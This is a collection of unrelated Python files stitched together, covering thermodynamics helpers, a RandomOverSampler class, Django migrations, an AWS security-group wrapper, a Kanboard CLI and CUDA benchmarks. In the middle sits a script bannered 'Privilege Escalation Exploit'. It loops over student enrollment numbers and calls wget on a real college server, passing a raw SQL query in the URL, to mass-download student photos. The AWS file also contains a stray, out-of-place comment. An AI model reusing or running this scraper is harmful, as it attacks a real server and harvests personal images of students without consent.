        eQ_cpd = self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
        if not eQ_cpd:
            return None
        dgf = self.CC.standard_dg_formation(eQ_cpd)
        dgf = dgf[0]

        return dgf

    def get_eQ_reaction_from_rid(
        self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[PhasedReaction, None]:
        """Get an eQuilibrator reaction object from an r_id.

        Parameters
        ----------
        r_id : str
            Reaction id to get object for.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            Database to look for reaction in.

        Returns
        -------
        PhasedReaction
            eQuilibrator reactiono to calculate ∆Gr with.
        """
        if pickaxe:
            if r_id in pickaxe.reactions:
                reaction_info = pickaxe.reactions[r_id]
            else:
                return None
        elif db_name:
            mine = self.client[db_name]
            reaction_info = mine.reactions.find_one({"_id": r_id})
            if not reaction_info:
                return None
        else:
            return None

        reactants = reaction_info["Reactants"]
        products = reaction_info["Products"]

        lhs = " + ".join(f"{r[0]} {r[1]}" for r in reactants)
        rhs = " + ".join(f"{p[0]} {p[1]}" for p in products)
        reaction_string = " => ".join([lhs, rhs])

        compounds = set([r[1] for r in reactants])
        compounds.update(tuple(p[1] for p in products))

        eQ_compound_dict = {
            c_id: self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
            for c_id in compounds
        }

        if not all(eQ_compound_dict.values()):
            return None

        if "X73bc8ef21db580aefe4dbc0af17d4013961d9d17" not in compounds:
            eQ_compound_dict["water"] = self._water

        eq_reaction = Reaction.parse_formula(eQ_compound_dict.get, reaction_string)

        return eq_reaction

    def physiological_dg_prime_from_rid(
        self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[pint.Measurement, None]:
        """Calculate the ∆Gm' of a reaction.

        Parameters
        ----------
        r_id : str
            ID of the reaction to calculate.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            MINE the reaction is found in.

        Returns
        -------
        pint.Measurement
            The calculated ∆G'm.
        """
        eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
        if not eQ_reaction:
            return None
        dGm_prime = self.CC.physiological_dg_prime(eQ_reaction)

        return dGm_prime

    def standard_dg_prime_from_rid(
        self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[pint.Measurement, None]:
        """Calculate the ∆G'o of a reaction.

        Parameters
        ----------
        r_id : str
            ID of the reaction to calculate.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            MINE the reaction is found in.

        Returns
        -------
        pint.Measurement
            The calculated ∆G'o.
        """
        eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
        if not eQ_reaction:
            return None
        dG0_prime = self.CC.standard_dg_prime(eQ_reaction)

        return dG0_prime

    def dg_prime_from_rid(
        self,
        r_id: str,
        pickaxe: Pickaxe = None,
        db_name: str = None,
        p_h: Q_ = default_physiological_p_h,
        p_mg: Q_ = default_physiological_p_mg,
        ionic_strength: Q_ = default_physiological_ionic_strength,
    ) -> Union[pint.Measurement, None]:
        """Calculate the ∆G' of a reaction.

        Parameters
        ----------
        r_id : str
            ID of the reaction to calculate.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            MINE the reaction is found in.
        p_h : Q_
            pH of system.
        p_mg: Q_
            pMg of the system.
        ionic_strength: Q_
            ionic strength of the system.

        Returns
        -------
        pint.Measurement
            The calculated ∆G'.
        """
        eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
        if not eQ_reaction:
            return None

        self.CC.p_h = p_h
        self.CC.p_mg = p_mg
        self.CC.ionic_strength = ionic_strength

        dG_prime = self.CC.dg_prime(eQ_reaction)

        self._reset_CC()

        return dG_prime

import os

#Decoration Starts
print """
+=============================================================+
||		  Privilege Escalation Exploit	             ||
||   +===================================================+   ||
||   |    _   _    _    ____ _  __    ____  ___ _____    |   ||
||   |   | | | |  / \  / ___| |/ /   |  _ \|_ _|_   _|   |   ||
||   |   | |_| | / _ \| |   | ' /    | |_) || |  | |     |   ||
||   |   |  _  |/ ___ \ |___| . \    |  _ < | |  | |     |   ||
||   |   |_| |_/_/   \_\____|_|\_\   |_| \_\___| |_|     |   ||
||   |                                                   |   ||
||   +===================================================+   ||
||   ~ by Yadnyawalkya Tale (yadnyawalkyatale@gmail.com) ~   ||
+=============================================================+
"""
#Decoration Ends

# Class according to Year Input 
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()

if year_input == 1:
	year_choice = 1300000 #Final Year
elif year_input == 2:
	year_choice = 1400000 #Third Year
elif year_input == 3:
	year_choice = 1500000 #Second Year
elif year_input == 4:
	year_choice = 1600000 #First Year

# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()

if class_input == 1:
	class_choice = 1000 #Automobile Department
elif class_input == 2:
	class_choice = 2000 #Civil Department
elif class_input == 3:
	class_choice = 3000 #ComputerScience Department
elif class_input == 4:
	class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
	class_choice = 5000 #ETC Department
elif class_input == 6:
	class_choice = 8000 #Electrial Department
elif class_input == 7:
	class_choice = 6000 #Mechanical Department

startflag = year_choice + class_choice 		#For eg. Start @ 1303000
if class_input == 7:
	endflag = year_choice + class_choice + 70 +128	#Special Arrangement for Mechanical ;)
else:
	endflag = year_choice + class_choice + 70 	#For eg. End @ 1303070

os.system("mkdir ritphotos")

decoration="="
while startflag < endflag:
    startflag = startflag + 1
    cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
    os.system(cmd1)
    decoration = "=" + decoration
    print "{0}".format(decoration)
print "100%\tPlease Wait..."

pstartflag = year_choice + class_choice + 150000
if class_input == 7:
	pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
	pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)

while pstartflag < pendflag:
    pstartflag = pstartflag + 1
    cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
    os.system(cmd2)

print "Downloading Images Complete..."
os.system("find ritphotos -size  0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images

import codecs

unicode_string = "Hello Python 3 String"

bytes_object = b"Hello Python 3 Bytes"

print(unicode_string, type(unicode_string))

print(bytes_object, type(bytes_object))



#decode to unicode_string

ux = str(object=bytes_object, encoding="utf-8", errors="strict")

print(ux, type(ux))

ux = bytes_object.decode(encoding="utf-8", errors="strict")

print(ux, type(ux))


hex_bytes = codecs.encode(b"Binary Object", "hex_codec")


def string_to_bytes( text ):
    return bin(int.from_bytes(text.encode(), 'big'))

def bytes_to_string( btext ):
    #btext = int('0b110100001100101011011000110110001101111', 2)
    return btext.to_bytes((btext.bit_length() + 7) // 8, 'big').decode()

def char_to_bytes(char):
    return bin(ord(char))

def encodes(text):

    bext = text.encode(encoding="utf-8")
    enc_bext = codecs.encode(bext, "hex_codec")

    return enc_bext.decode("utf-8")

def decodes():
    pass


if __name__ == "__main__":

    print( encodes("walla") )



﻿"""Class to perform random over-sampling."""

# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
#          Christos Aridas
# License: MIT

from collections.abc import Mapping
from numbers import Real

import numpy as np
from scipy import sparse
from sklearn.utils import check_array, check_random_state
from sklearn.utils import _safe_indexing
from sklearn.utils.sparsefuncs import mean_variance_axis

from .base import BaseOverSampler
from ..utils import check_target_type
from ..utils import Substitution
from ..utils._docstring import _random_state_docstring
from ..utils._validation import _deprecate_positional_args


@Substitution(
    sampling_strategy=BaseOverSampler._sampling_strategy_docstring,
    random_state=_random_state_docstring,
)
class RandomOverSampler(BaseOverSampler):
    """Class to perform random over-sampling.

    Object to over-sample the minority class(es) by picking samples at random
    with replacement. The bootstrap can be generated in a smoothed manner.

    Read more in the :ref:`User Guide <random_over_sampler>`.

    Parameters
    ----------
    {sampling_strategy}

    {random_state}

    shrinkage : float or dict, default=None
        Parameter controlling the shrinkage applied to the covariance matrix.
        when a smoothed bootstrap is generated. The options are:

        - if `None`, a normal bootstrap will be generated without perturbation.
          It is equivalent to `shrinkage=0` as well;
        - if a `float` is given, the shrinkage factor will be used for all
          classes to generate the smoothed bootstrap;
        - if a `dict` is given, the shrinkage factor will specific for each
          class. The key correspond to the targeted class and the value is
          the shrinkage factor.

        The value needs of the shrinkage parameter needs to be higher or equal
        to 0.

        .. versionadded:: 0.8

    Attributes
    ----------
    sampling_strategy_ : dict
        Dictionary containing the information to sample the dataset. The keys
        corresponds to the class labels from which to sample and the values
        are the number of samples to sample.

    sample_indices_ : ndarray of shape (n_new_samples,)
        Indices of the samples selected.

        .. versionadded:: 0.4

    shrinkage_ : dict or None
        The per-class shrinkage factor used to generate the smoothed bootstrap
        sample. When `shrinkage=None` a normal bootstrap will be generated.

        .. versionadded:: 0.8

    n_features_in_ : int
        Number of features in the input dataset.

        .. versionadded:: 0.9

    See Also
    --------
    BorderlineSMOTE : Over-sample using the borderline-SMOTE variant.

    SMOTE : Over-sample using SMOTE.

    SMOTENC : Over-sample using SMOTE for continuous and categorical features.

    SMOTEN : Over-sample using the SMOTE variant specifically for categorical
        features only.

    SVMSMOTE : Over-sample using SVM-SMOTE variant.

    ADASYN : Over-sample using ADASYN.

    KMeansSMOTE : Over-sample applying a clustering before to oversample using
        SMOTE.

    Notes
    -----
    Supports multi-class resampling by sampling each class independently.
    Supports heterogeneous data as object array containing string and numeric
    data.

    When generating a smoothed bootstrap, this method is also known as Random
    Over-Sampling Examples (ROSE) [1]_.

    .. warning::
       Since smoothed bootstrap are generated by adding a small perturbation
       to the drawn samples, this method is not adequate when working with
       sparse matrices.

    References
    ----------
    .. [1] G Menardi, N. Torelli, "Training and assessing classification
       rules with imbalanced data," Data Mining and Knowledge
       Discovery, 28(1), pp.92-122, 2014.

    Examples
    --------
    >>> from collections import Counter
    >>> from sklearn.datasets import make_classification
    >>> from imblearn.over_sampling import \
RandomOverSampler # doctest: +NORMALIZE_WHITESPACE
    >>> X, y = make_classification(n_classes=2, class_sep=2,
    ... weights=[0.1, 0.9], n_informative=3, n_redundant=1, flip_y=0,
    ... n_features=20, n_clusters_per_class=1, n_samples=1000, random_state=10)
    >>> print('Original dataset shape %s' % Counter(y))
    Original dataset shape Counter({{1: 900, 0: 100}})
    >>> ros = RandomOverSampler(random_state=42)
    >>> X_res, y_res = ros.fit_resample(X, y)
    >>> print('Resampled dataset shape %s' % Counter(y_res))
    Resampled dataset shape Counter({{0: 900, 1: 900}})
    """

    @_deprecate_positional_args
    def __init__(
        self,
        *,
        sampling_strategy="auto",
        random_state=None,
        shrinkage=None,
    ):
        super().__init__(sampling_strategy=sampling_strategy)
        self.random_state = random_state
        self.shrinkage = shrinkage

    def _check_X_y(self, X, y):
        y, binarize_y = check_target_type(y, indicate_one_vs_all=True)
        X, y = self._validate_data(
            X,
            y,
            reset=True,
            accept_sparse=["csr", "csc"],
            dtype=None,
            force_all_finite=False,
        )
        return X, y, binarize_y

    def _fit_resample(self, X, y):
        random_state = check_random_state(self.random_state)

        if isinstance(self.shrinkage, Real):
            self.shrinkage_ = {
                klass: self.shrinkage for klass in self.sampling_strategy_
            }
        elif self.shrinkage is None or isinstance(self.shrinkage, Mapping):
            self.shrinkage_ = self.shrinkage
        else:
            raise ValueError(
                f"`shrinkage` should either be a positive floating number or "
                f"a dictionary mapping a class to a positive floating number. "
                f"Got {repr(self.shrinkage)} instead."
            )

        if self.shrinkage_ is not None:
            missing_shrinkage_keys = (
                self.sampling_strategy_.keys() - self.shrinkage_.keys()
            )
            if missing_shrinkage_keys:
                raise ValueError(
                    f"`shrinkage` should contain a shrinkage factor for "
                    f"each class that will be resampled. The missing "
                    f"classes are: {repr(missing_shrinkage_keys)}"
                )

            for klass, shrink_factor in self.shrinkage_.items():
                if shrink_factor < 0:
                    raise ValueError(
                        f"The shrinkage factor needs to be >= 0. "
                        f"Got {shrink_factor} for class {klass}."
                    )

            # smoothed bootstrap imposes to make numerical operation; we need
            # to be sure to have only numerical data in X
            try:
                X = check_array(X, accept_sparse=["csr", "csc"], dtype="numeric")
            except ValueError as exc:
                raise ValueError(
                    "When shrinkage is not None, X needs to contain only "
                    "numerical data to later generate a smoothed bootstrap "
                    "sample."
                ) from exc

        X_resampled = [X.copy()]
        y_resampled = [y.copy()]

        sample_indices = range(X.shape[0])
        for class_sample, num_samples in self.sampling_strategy_.items():
            target_class_indices = np.flatnonzero(y == class_sample)
            bootstrap_indices = random_state.choice(
                target_class_indices,
                size=num_samples,
                replace=True,
            )
            sample_indices = np.append(sample_indices, bootstrap_indices)
            if self.shrinkage_ is not None:
                # generate a smoothed bootstrap with a perturbation
                n_samples, n_features = X.shape
                smoothing_constant = (4 / ((n_features + 2) * n_samples)) ** (
                    1 / (n_features + 4)
                )
                if sparse.issparse(X):
                    _, X_class_variance = mean_variance_axis(
                        X[target_class_indices, :],
                        axis=0,
                    )
                    X_class_scale = np.sqrt(X_class_variance, out=X_class_variance)
                else:
                    X_class_scale = np.std(X[target_class_indices, :], axis=0)
                smoothing_matrix = np.diagflat(
                    self.shrinkage_[class_sample] * smoothing_constant * X_class_scale
                )
                X_new = random_state.randn(num_samples, n_features)
                X_new = X_new.dot(smoothing_matrix) + X[bootstrap_indices, :]
                if sparse.issparse(X):
                    X_new = sparse.csr_matrix(X_new, dtype=X.dtype)
                X_resampled.append(X_new)
            else:
                # generate a bootstrap
                X_resampled.append(_safe_indexing(X, bootstrap_indices))

            y_resampled.append(_safe_indexing(y, bootstrap_indices))

        self.sample_indices_ = np.array(sample_indices)

        if sparse.issparse(X):
            X_resampled = sparse.vstack(X_resampled, format=X.format)
        else:
            X_resampled = np.vstack(X_resampled)
        y_resampled = np.hstack(y_resampled)

        return X_resampled, y_resampled

    def _more_tags(self):
        return {
            "X_types": ["2darray", "string", "sparse", "dataframe"],
            "sample_indices": True,
            "allow_nan": True,
        }

# Source Generated with Decompyle++
# File: session_recording.pyc (Python 2.5)

from __future__ import absolute_import
from pushbase.session_recording_component import FixedLengthSessionRecordingComponent

class SessionRecordingComponent(FixedLengthSessionRecordingComponent):
    
    def __init__(self, *a, **k):
        super(SessionRecordingComponent, self).__init__(*a, **a)
        self.set_trigger_recording_on_release(not (self._record_button.is_pressed))

    
    def set_trigger_recording_on_release(self, trigger_recording):
        self._should_trigger_recording = trigger_recording

    
    def _on_record_button_pressed(self):
        pass

    
    def _on_record_button_released(self):
        if self._should_trigger_recording:
            self._trigger_recording()
        
        self._should_trigger_recording = True



# Generated by Django 2.1 on 2018-08-26 00:54

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('model_filefields_example', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='book',
            name='cover',
            field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
        ),
        migrations.AlterField(
            model_name='book',
            name='index',
            field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
        ),
        migrations.AlterField(
            model_name='book',
            name='pages',
            field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
        ),
        migrations.AlterField(
            model_name='sounddevice',
            name='instruction_manual',
            field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
        ),
    ]

""" -*- coding: utf-8 -*- """

from python2awscli import bin_aws
from python2awscli.error import AWSNotFound, ParseError, AWSDuplicate
from python2awscli import must


class BaseSecurityGroup(object):
    def __init__(self, name, region, vpc, description, inbound=None, outbound=None):
        """
        :param name: String, name of SG
        :param region: String, AWS region
        :param vpc: String, IP of the VPC this SG belongs to
        :param description: String
        :param inbound: List of dicts, IP Permissions that should exist
        :param outbound: List of dicts, IP Permissions that should exist
        """
        self.id = None
        self.name = name
        self.region = region
        self.vpc = vpc
        self.description = description
        self.IpPermissions = []
        self.IpPermissionsEgress = []
        self.owner = None
        self.changed = False
        try:
            self._get()
        except AWSNotFound:
            self._create()
        self._merge_rules(must.be_list(inbound), self.IpPermissions)
        self._merge_rules(must.be_list(outbound), self.IpPermissionsEgress, egress=True)
        if self.changed:
            self._get()

    def _break_out(self, existing):
        """
        Undo AWS's rule flattening so we can do simple 'if rule in existing' logic later.
        :param existing: List of SG rules as dicts.
        :return: List of SG rules as dicts.
        """
        spool = list()
        for rule in existing:
            for ip in rule['IpRanges']:
                copy_of_rule = rule.copy()
                copy_of_rule['IpRanges'] = [ip]
                copy_of_rule['UserIdGroupPairs'] = []
                spool.append(copy_of_rule)
            for group in rule['UserIdGroupPairs']:
                copy_of_rule = rule.copy()
                copy_of_rule['IpRanges'] = []
                copy_of_rule['UserIdGroupPairs'] = [group]
                spool.append(copy_of_rule)
        return spool

    def _merge_rules(self, requested, active, egress=False):
        """
        :param requested: List of dicts, IP Permissions that should exist
        :param active: List of dicts, IP Permissions that already exist
        :param egress: Bool, addressing outbound rules or not?
        :return: Bool
        """
        if not isinstance(requested, list):
            raise ParseError(
                'SecurityGroup {0}, need a list of dicts, instead got "{1}"'.format(self.name, requested))
        for rule in requested:
            if rule not in active:
                self._add_rule(rule, egress)
        for active_rule in active:
            if active_rule not in requested:
                self._rm_rule(active_rule, egress)
        return True

    def _add_rule(self, ip_permissions, egress):
        """
        :param ip_permissions: Dict of IP Permissions
        :param egress: Bool
        :return: Bool
        """
        direction = 'authorize-security-group-ingress'
        if egress:
            direction = 'authorize-security-group-egress'
        command = ['ec2', direction,
                   '--region', self.region,
                   '--group-id', self.id,
                   '--ip-permissions', str(ip_permissions).replace("'", '"')
                   ]
        bin_aws(command)
        print('Authorized: {0}'.format(ip_permissions))  # TODO: Log(...)
        self.changed = True
        return True

    def _rm_rule(self, ip_permissions, egress):
        """
        :param ip_permissions: Dict of IP Permissions
        :param egress: Bool
        :return: Bool
        """
        direction = 'revoke-security-group-ingress'
        if egress:
            direction = 'revoke-security-group-egress'
        command = ['ec2', direction,
                   '--region', self.region,
                   '--group-id', self.id,
                   '--ip-permissions', str(ip_permissions).replace("'", '"')
                   ]
        bin_aws(command)
        print('Revoked: {0}'.format(ip_permissions))  # TODO: Log(...)
        self.changed = True
        return True

    def _create(self):
        """
        Create a Security Group
        :return:
        """
        # AWS grants all new SGs this default outbound rule "This is pro-human & anti-machine behavior."
        default_egress = {
            'Ipv6Ranges': [],
            'PrefixListIds': [],
            'IpRanges': [{'CidrIp': '0.0.0.0/0'}],
            'UserIdGroupPairs': [], 'IpProtocol': '-1'
        }
        command = [
                'ec2', 'create-security-group',
                '--region', self.region,
                '--group-name',  self.name,
                '--description', self.description,
                '--vpc-id', self.vpc
                ]
        try:
            self.id = bin_aws(command, key='GroupId')
        except AWSDuplicate:
            return False  # OK if it already exists.
        print('Created {0}'.format(command))  # TODO: Log(...)
        self.IpPermissions = []
        self.IpPermissionsEgress = [default_egress]
        self.changed = True
        return True

    def _get(self):
        """
        Get information about Security Group from AWS and update self
        :return: Bool
        """
        command = ['ec2', 'describe-security-groups', '--region', self.region, '--group-names', self.name]
        result = bin_aws(command, key='SecurityGroups', max=1)  # will raise NotFound if empty
        me = result[0]
        self.id = me['GroupId']
        self.owner = me['OwnerId']
        self.IpPermissions = self._break_out(me['IpPermissions'])
        self.IpPermissionsEgress = self._break_out(me['IpPermissionsEgress'])
        print('Got {0}'.format(command))  # TODO: Log(...)
        return True

    def _delete(self):
        """
        Delete myself by my own id.
        As of 20170114 no other methods call me. You must do `foo._delete()`
        :return:
        """
        command = ['ec2', 'delete-security-group', '--region', self.region,
                   # '--dry-run',
                   '--group-id', self.id
                   ]
        bin_aws(command, decode_output=False)
        print('Deleted {0}'.format(command))  # TODO: Log(...)
        return True

# -*- coding: utf-8 -*-
"""urls.py: messages extends"""

from django.conf.urls import url
from messages_extends.views import message_mark_all_read, message_mark_read
urlpatterns = [
    url(r'^mark_read/(?P<message_id>\d+)/$', message_mark_read, name='message_mark_read'),
    url(r'^mark_read/all/$', message_mark_all_read, name='message_mark_all_read'),
]

# The MIT License (MIT)
#
# Copyright (c) 2016 Frederic Guillot
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

from cliff import app
from cliff import commandmanager
from pbr import version as app_version
import sys

from kanboard_cli.commands import application
from kanboard_cli.commands import project
from kanboard_cli.commands import task
from kanboard_cli import client


class KanboardShell(app.App):

    def __init__(self):
        super(KanboardShell, self).__init__(
            description='Kanboard Command Line Client',
            version=app_version.VersionInfo('kanboard_cli').version_string(),
            command_manager=commandmanager.CommandManager('kanboard.cli'),
            deferred_help=True)
        self.client = None
        self.is_super_user = True

    def build_option_parser(self, description, version, argparse_kwargs=None):
        parser = super(KanboardShell, self).build_option_parser(
            description, version, argparse_kwargs=argparse_kwargs)

        parser.add_argument(
            '--url',
            metavar='<api url>',
            help='Kanboard API URL',
        )

        parser.add_argument(
            '--username',
            metavar='<api username>',
            help='API username',
        )

        parser.add_argument(
            '--password',
            metavar='<api password>',
            help='API password/token',
        )

        parser.add_argument(
            '--auth-header',
            metavar='<authentication header>',
            help='API authentication header',
        )

        return parser

    def initialize_app(self, argv):
        client_manager = client.ClientManager(self.options)
        self.client = client_manager.get_client()
        self.is_super_user = client_manager.is_super_user()

        self.command_manager.add_command('app version', application.ShowVersion)
        self.command_manager.add_command('app timezone', application.ShowTimezone)
        self.command_manager.add_command('project show', project.ShowProject)
        self.command_manager.add_command('project list', project.ListProjects)
        self.command_manager.add_command('task create', task.CreateTask)
        self.command_manager.add_command('task list', task.ListTasks)


def main(argv=sys.argv[1:]):
    return KanboardShell().run(argv)


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))

default_app_config = "gallery.apps.GalleryConfig"

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import os, sys
import tempfile
from winsys._compat import unittest
import uuid

import win32file

from winsys.tests.test_fs import utils
from winsys import fs

class TestFS (unittest.TestCase):

  filenames = ["%d" % i for i in range (5)]

  def setUp (self):
    utils.mktemp ()
    for filename in self.filenames:
      with open (os.path.join (utils.TEST_ROOT, filename), "w"):
        pass

  def tearDown (self):
    utils.rmtemp ()

  def test_glob (self):
    import glob
    pattern = os.path.join (utils.TEST_ROOT, "*")
    self.assertEquals (list (fs.glob (pattern)), glob.glob (pattern))

  def test_listdir (self):
    import os
    fs_version = list (fs.listdir (utils.TEST_ROOT))
    os_version = os.listdir (utils.TEST_ROOT)
    self.assertEquals (fs_version, os_version, "%s differs from %s" % (fs_version, os_version))

#
# All the other module-level functions are hand-offs
# to the corresponding Entry methods.
#

if __name__ == "__main__":
  unittest.main ()
  if sys.stdout.isatty (): raw_input ("Press enter...")

import numpy as np
import matplotlib.pylab as plt

from numba import cuda, uint8, int32, uint32, jit
from timeit import default_timer as timer

@cuda.jit('void(uint8[:], int32, int32[:], int32[:])')
def lbp_kernel(input, neighborhood, powers, h):
    i = cuda.grid(1)
    r = 0
    if i < input.shape[0] - 2 * neighborhood:
        i += neighborhood
        for j in range(i - neighborhood, i):
            if input[j] >= input[i]:
                r += powers[j - i + neighborhood]
    
        for j in range(i + 1, i + neighborhood + 1):
            if input[j] >= input[i]:
                r += powers[j - i + neighborhood - 1]

        cuda.atomic.add(h, r, 1)

def extract_1dlbp_gpu(input, neighborhood, d_powers):
    maxThread = 512

    blockDim = maxThread
    d_input = cuda.to_device(input)

    hist = np.zeros(2 ** (2 * neighborhood), dtype='int32')
    gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim

    d_hist = cuda.to_device(hist)

    lbp_kernel[gridDim, blockDim](d_input, neighborhood, d_powers, d_hist)
    d_hist.to_host()
    return hist

def extract_1dlbp_gpu_debug(input, neighborhood, powers, res):
    maxThread = 512
    blockDim = maxThread
    gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
    
    for block in range(0, gridDim):
        for thread in range(0, blockDim):
            r = 0
            i = blockDim * block + thread
            if i < input.shape[0] - 2 * neighborhood:
                i += neighborhood
                for j in range(i - neighborhood, i):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood]
    
                for j in range(i + 1, i + neighborhood + 1):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood - 1]

                res[r] += 1
    return res

@jit("int32[:](uint8[:], int64, int32[:], int32[:])", nopython=True)
def extract_1dlbp_cpu_jit(input, neighborhood, powers, res):
    maxThread = 512
    blockDim = maxThread
    gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
    
    for block in range(0, gridDim):
        for thread in range(0, blockDim):
            r = 0
            i = blockDim * block + thread
            if i < input.shape[0] - 2 * neighborhood:
                i += neighborhood
                for j in range(i - neighborhood, i):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood]
    
                for j in range(i + 1, i + neighborhood + 1):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood - 1]

                res[r] += 1
    return res

def extract_1dlbp_cpu(input, neighborhood, p):
    """
    Extract the 1d lbp pattern on CPU
    """
    res = np.zeros(1 << (2 * neighborhood))
    for i in range(neighborhood, len(input) - neighborhood):
        left = input[i - neighborhood : i]
        right = input[i + 1 : i + neighborhood + 1]
        both = np.r_[left, right]
        res[np.sum(p [both >= input[i]])] += 1
    return res

X = np.arange(3, 7)
X = 10 ** X
neighborhood = 4

cpu_times = np.zeros(X.shape[0])
cpu_times_simple = cpu_times.copy()
cpu_times_jit = cpu_times.copy()
gpu_times = np.zeros(X.shape[0])

p = 1 << np.array(range(0, 2 * neighborhood), dtype='int32')
d_powers = cuda.to_device(p)

for i, x in enumerate(X):
    input = np.random.randint(0, 256, size = x).astype(np.uint8)

    print "Length: {0}".format(x)
    print "--------------"

    start = timer()
    h_cpu = extract_1dlbp_cpu(input, neighborhood, p)
    cpu_times[i] = timer() - start
    print "Finished on CPU: time: {0:3.5f}s".format(cpu_times[i])

    res = np.zeros(1 << (2 * neighborhood), dtype='int32')
    start = timer()
    h_cpu_simple = extract_1dlbp_gpu_debug(input, neighborhood, p, res)
    cpu_times_simple[i] = timer() - start
    print "Finished on CPU (simple): time: {0:3.5f}s".format(cpu_times_simple[i])

    res = np.zeros(1 << (2 * neighborhood), dtype='int32')
    start = timer()
    h_cpu_jit = extract_1dlbp_cpu_jit(input, neighborhood, p, res)
    cpu_times_jit[i] = timer() - start
    print "Finished on CPU (numba: jit): time: {0:3.5f}s".format(cpu_times_jit[i])

    start = timer()
    h_gpu = extract_1dlbp_gpu(input, neighborhood, d_powers)
    gpu_times[i] = timer() - start
    print "Finished on GPU: time: {0:3.5f}s".format(gpu_times[i])
    print "All h_cpu == h_gpu: ", (h_cpu_jit == h_gpu).all() and (h_cpu_simple == h_cpu_jit).all() and (h_cpu == h_cpu_jit).all()
    print ''

f = plt.figure(figsize=(10, 5))

plt.plot(X, cpu_times, label = "CPU")
plt.plot(X, cpu_times_simple, label = "CPU non-vectorized")
plt.plot(X, cpu_times_jit, label = "CPU jit")
plt.plot(X, gpu_times, label = "GPU")
plt.yscale('log')
plt.xscale('log')
plt.xlabel('input length')
plt.ylabel('time, sec')
plt.legend()
plt.show()

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "corponovo.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)

import time
t1=.3
t2=.1

path="~/Dropbox/Ingenieria/asignaturas_actuales"

time.sleep(t2)
keyboard.send_key("<f6>")
time.sleep(t2)
keyboard.send_keys(path)
time.sleep(t1)
keyboard.send_key("<enter>")

from charmhelpers.core.hookenv import (
    config,
    unit_get,
)

from charmhelpers.contrib.network.ip import (
    get_address_in_network,
    is_address_in_network,
    is_ipv6,
    get_ipv6_addr,
)

from charmhelpers.contrib.hahelpers.cluster import is_clustered

PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'

_address_map = {
    PUBLIC: {
        'config': 'os-public-network',
        'fallback': 'public-address'
    },
    INTERNAL: {
        'config': 'os-internal-network',
        'fallback': 'private-address'
    },
    ADMIN: {
